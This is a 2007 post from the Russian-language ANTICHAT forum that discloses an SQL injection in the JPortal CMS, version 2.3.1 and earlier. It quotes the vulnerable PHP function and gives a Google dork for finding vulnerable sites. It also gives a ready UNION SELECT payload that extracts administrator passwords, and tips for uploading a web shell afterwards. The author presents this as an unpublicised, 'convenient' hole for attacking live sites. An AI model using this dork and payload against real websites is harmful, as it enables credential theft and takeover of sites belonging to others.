JPoprtal 2.3.1 и ниже SQL иньекция.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

JPoprtal 2.3.1 и ниже SQL иньекция.

09.11.2007, 15:43

Alexsize

Fail

Регистрация: 17.09.2005

Сообщений: 2,242

Провел на форуме:
9089375

Репутация: 4268

JPoprtal 2.3.1 и ниже SQL иньекция.

Популярная в Польше CMS.
Я не стану описывать все скули что были найдены в этой CMS, некоторые есть и в паблике. Эта уязвимость наиболее "удобна" и нигде не засвечена.
Уязвимо большинство сайтов, все версии. На официальном сайте просто защита от "хакеров", но и он уязвим.

Уязвимый код:

PHP код:


		
			
function topic_name($a) 

{    

global $topic_tbl;

$query = "SELECT * FROM $topic_tbl WHERE id=$a";

$result = mysql_query($query);  

$r = mysql_fetch_array($result);    

return '<a href="articles.php?topic='.$a.'" class="t_main">'.$r['title'].'</a>';  

}

Дорк:intext:"jPORTAL 2" & inurl:"articles.php?topic="

Код:

articles.php?topic=-3+union+select+1,pass,3,4,5+from+admins/

В более старых версиях jp_admins. Также есть таблица users или jp_users.

Шелл заливать двумя способами: Аплоад файлов без фильтра или блоки, позволяющие вставлять php код.

__________________
...

Последний раз редактировалось Alexsize; 09.11.2007 в 15:50..